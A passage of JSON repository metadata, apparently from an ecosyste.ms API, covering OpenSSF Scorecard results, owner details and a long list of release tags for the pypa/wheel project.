artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/publish.yml:31"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Branch-Protection","score":0,"reason":"branch protection not enabled on development/release branches","details":["Warn: branch protection not enabled for branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Security-Policy","score":0,"reason":"security policy file not detected","details":["Warn: no security policy file detected","Warn: no security file to analyze","Warn: no security file to analyze","Warn: no security file to analyze"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"SAST","score":5,"reason":"SAST tool is not run on all commits -- score normalized to 5","details":["Warn: 6 commits out of 12 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-22T20:33:25.724Z","repository_id":23174547,"created_at":"2025-08-22T20:33:25.724Z","updated_at":"2025-08-22T20:33:25.724Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":281742688,"owners_count":26553720,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-10-30T02:00:06.501Z","response_time":61,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"pypa","name":"Python Packaging Authority","uuid":"647025","kind":"organization","description":"","email":"info@pypa.io","website":"https://www.pypa.io","location":"United States of America","twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/647025?v=4","repositories_count":58,"last_synced_at":"2025-10-30T00:34:30.821Z","metadata":{"has_sponsors_listing":true},"html_url":"https://github.com/pypa","funding_links":["https://github.com/sponsors/pypa"],"total_stars":88807,"followers":2132,"following":0,"created_at":"2022-11-02T16:21:37.826Z","updated_at":"2025-10-30T00:34:30.821Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/pypa","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/pypa/repositories"},"tags":[{"name":"0.46.1","sha":"7a0ea7f7c3dd73747e37368bb074cd0d9fb49259","kind":"commit","published_at":"2025-04-08T20:53:52.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.46.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.46.1/manifests"},{"name":"0.46.0","sha":"1da658384bbfc14c091085bb98828e68368a1ed5","kind":"commit","published_at":"2025-04-03T09:39:52.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.46.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.46.0/manifests"},{"name":"0.45.1","sha":"7855525de4093257e7bfb434877265e227356566","kind":"commit","published_at":"2024-11-23T00:14:12.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.45.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.45.1/manifests"},{"name":"0.45.0","sha":"d78f0e372199f8294556345d867af4d3cf118418","kind":"commit","published_at":"2024-11-08T21:40:06.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.45.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.45.0/manifests"},{"name":"0.44.0","sha":"7bb46d7727e6e89fe56b3c78297b3af2672bbbe2","kind":"commit","published_at":"2024-08-04T14:48:22.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.44.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.44.0/manifests"},{"name":"0.43.0","sha":"fa33dfd01fd665c1fd90097563b34bce4b5527ef","kind":"commit","published_at":"2024-03-11T19:28:01.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.43.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.43.0/manifests"},{"name":"0.42.0","sha":"63a09bb3d92630c1d35f4fcc6f79250256aeeb5c","kind":"commit","published_at":"2023-11-26T14:35:45.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.42.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.42.0/manifests"},{"name":"0.41.3","sha":"a899f1c69ffddf564b904a5de974457c213dc36a","kind":"commit","published_at":"2023-10-30T10:04:00.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.41.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.3/manifests"},{"name":"0.41.2","sha":"e76040b0d970a0fe6211c31888fc929078ba02d9","kind":"commit","published_at":"2023-08-22T09:29:26.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.41.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.2/manifests"},{"name":"0.41.1","sha":"b626a4a2ee6a887c7ad4b984fcb4d465dbfa337d","kind":"commit","published_at":"2023-08-05T13:31:27.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.41.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.1/manifests"},{"name":"0.41.0","sha":"95c2d83cde174ed3c34d5a5b53dc3b3a1ace91b6","kind":"commit","published_at":"2023-07-22T10:59:41.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.41.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.0/manifests"},{"name":"0.40.0","sha":"461f7a3a2d4824009ca4855b3300d61e6d405dc4","kind":"commit","published_at":"2023-03-14T14:38:44.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.40.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.40.0/manifests"},{"name":"0.38.4","sha":"814c2efe8e40051039c5a6de6945e04ecdd162ee","kind":"commit","published_at":"2022-11-09T20:33:01.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.38.4","html_url":"https://github.com/pypa/wheel/releases/tag/0.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.4/manifests"},{"name":"0.38.3","sha":"daeb157c8207b1459fc7baa5f234c165a7a5faf4","kind":"commit","published_at":"2022-11-08T17:46:24.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.38.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.3/manifests"},{"name":"0.38.2","sha":"44193907eb308930de05deed863fb4d157c5c866","kind":"commit","published_at":"2022-11-05T12:52:57.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.38.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.2/manifests"},{"name":"0.38.1","sha":"6f1608dc1a88f00d2390b9044bd655753f39234c","kind":"commit","published_at":"2022-11-04T09:09:25.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.38.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.1/manifests"},{"name":"0.38.0","sha":"fcb94cd51f7dfd40d88dff37415750d9e3638d3b","kind":"commit","published_at":"2022-10-20T21:19:31.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.38.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.0/manifests"},{"name":"0.37.1","sha":"c716c87ffa528ac9a31de3ed3217058848dc2cd2","kind":"commit","published_at":"2021-12-22T12:19:07.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.37.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.37.1/manifests"},{"name":"0.37.0","sha":"b8c4aa055cea0132776e7e53edce3538710d5b68","kind":"commit","published_at":"2021-08-09T20:44:19.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.37.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.37.0/manifests"},{"name":"0.36.2","sha":"4fb47f98550f3f43fc0b8c73f518592124ae21bd","kind":"commit","published_at":"2020-12-13T18:07:13.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.36.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.2/manifests"},{"name":"0.36.1","sha":"64550e15fdbc96d5690dc872257edc859c218068","kind":"commit","published_at":"2020-12-04T14:00:01.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.36.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.1/manifests"},{"name":"0.36.0","sha":"39b6397ba944d82f1fe37d043382f97b78a919d6","kind":"commit","published_at":"2020-12-01T08:52:46.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.36.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.0/manifests"},{"name":"0.35.1","sha":"bbc60829bea2eb25ccd236b9c6c16c9ee4f0d2ef","kind":"commit","published_at":"2020-08-14T19:22:54.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.35.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.35.1/manifests"},{"name":"0.35.0","sha":"4253bbb865823101d1a1757d12239fc74f49c4e7","kind":"commit","published_at":"2020-08-13T21:08:53.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.35.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.35.0/manifests"},{"name":"0.34.2","sha":"0036f80513457a95a309c81d8a63f113b52dbafa","kind":"commit","published_at":"2020-01-30T22:20:12.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.34.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.2/manifests"},{"name":"0.34.1","sha":"43078c409ebe9b7d5d70c2476fcb82055e8f0b97","kind":"tag","published_at":"2020-01-27T20:20:14.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.34.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.1/manifests"},{"name":"0.34.0","sha":"8b2312799f46359ac78f3b011dc758c45518e9e1","kind":"commit","published_at":"2020-01-27T08:21:26.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.34.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.0/manifests"},{"name":"0.33.6","sha":"b227ddd5beaba49294017d061d501f6d433393b0","kind":"commit","published_at":"2019-08-18T09:55:37.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.6","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.6/manifests"},{"name":"0.33.5","sha":"9ee9726620f80232ca49991dbeef83963d94482a","kind":"commit","published_at":"2019-08-17T16:13:24.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.5","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.5/manifests"},{"name":"0.33.4","sha":"882cd05d9bf4c4fc72568d806e227b5cf14df1d7","kind":"commit","published_at":"2019-05-11T21:41:35.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.4","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.4/manifests"},{"name":"0.33.3","sha":"7b782219d5322ee66cef293c5c5b49fbd4133a0d","kind":"commit","published_at":"2019-05-10T11:06:01.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.3/manifests"},{"name":"0.33.2","sha":"9534258081b4abf3af817dab976bc95ecc4bfa30","kind":"commit","published_at":"2019-05-09T08:18:30.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.2/manifests"},{"name":"0.33.1","sha":"c15924d80ed2235f277569d99bb9d80f59c9b19d","kind":"commit","published_at":"2019-02-19T14:03:57.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.1/manifests"},{"name":"0.33.0","sha":"bb54233a2dc855951fa40a48d5730c67f9d570c8","kind":"commit","published_at":"2019-02-12T06:58:33.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.0/manifests"},{"name":"0.32.3","sha":"11584b78a56b4eedba4eedc55c9dac8aa2dd7070","kind":"commit","published_at":"2018-11-19T00:16:37.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.32.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.3/manifests"},{"name":"0.32.2","sha":"3d3708c659f7b9988f958539e7748a1a01ee6e77","kind":"commit","published_at":"2018-10-20T20:03:14.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.32.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.2/manifests"},{"name":"0.32.1","sha":"e284ddf676adffa22f6d6a7b02be7328acfe23c4","kind":"commit","published_at":"2018-10-04T06:42:04.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.32.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.1/manifests"},{"name":"0.32.0","sha":"46e55b9bc7ac63d4c3a4dee706515968d58848ac","kind":"commit","published_at":"2018-09-29T15:36:41.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.32.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.0/manifests"},{"name":"0.31.1","sha":"3dc261abc98a5e43bc7fcf5783d080aaf8f9f0cf","kind":"commit","published_at":"2018-05-13T17:22:12.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.31.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.31.1/manifests"},{"name":"0.31.0","sha":"13d6ff3e8ef509b469d6bb6dd9cd8870ac3f2a16","kind":"commit","published_at":"2018-04-01T20:34:19.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.31.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.31.0/manifests"},{"name":"0.30.0","sha":"3c9cc212a76b334307985cebfa7ebf269a419223","kind":"commit","published_at":"2017-09-10T21:53:40.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.30.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.30.0/manifests"},{"name":"0.29.0","sha":"bc574d6ed73dabee02e4e00764172d6284a37cb4","kind":"commit","published_at":"2016-02-06T17:18:19.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.29.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.29.0/manifests"},{"name":"0.28.0","sha":"36997ae4545f3c876771a53f11ae4aa9127cabfe","kind":"commit","published_at":"2016-02-05T21:35:05.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.28.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.28.0/manifests"},{"name":"0.27.0","sha":"379fe05f71fc6144d5f58e582b6580339479e238","kind":"commit","published_at":"2016-02-05T16:38:24.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.27.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pyp